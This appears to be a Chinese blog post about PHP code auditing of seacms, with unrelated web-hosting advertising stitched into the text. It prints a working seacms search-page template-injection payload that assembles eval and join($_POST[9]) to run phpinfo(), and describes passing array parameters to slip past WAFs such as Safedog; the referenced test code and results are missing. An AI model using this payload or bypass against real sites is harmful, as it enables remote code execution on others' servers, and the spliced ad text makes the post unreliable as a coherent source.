重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
最近开始学习php审计,刚好赶上研究seacms,就发现了payload处一个奇怪的点
站在用户的角度思考问题,与客户深入沟通,找到运城网站设计与运城网站推广的解决方案,凭借多年的经验,让设计与互联网技术结合,创造个性化、用户体验好的作品,建站类型包括:网站设计、成都网站制作、企业官网、英文网站、手机端网站、网站推广、域名与空间、网络空间、企业邮箱。业务覆盖运城地区。
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
9[]=ph&9[]=pinfo();
就尝试了一下,发现在接收数据时,例:
键名=a,那传递a[]=a&a[]=b时,a即为一个数组,便做了个测试,果真如此
服务器端测试代码
测试结果如下
那么这一个有什么用呢?思考了一下,如果服务器上有安全狗或者waf等防护工具,那么配合其他php函数,例如join函数,可能可以达到绕过效果
提供一个简单思路
服务器测试代码
测试结果如下
错误之处,敬请指正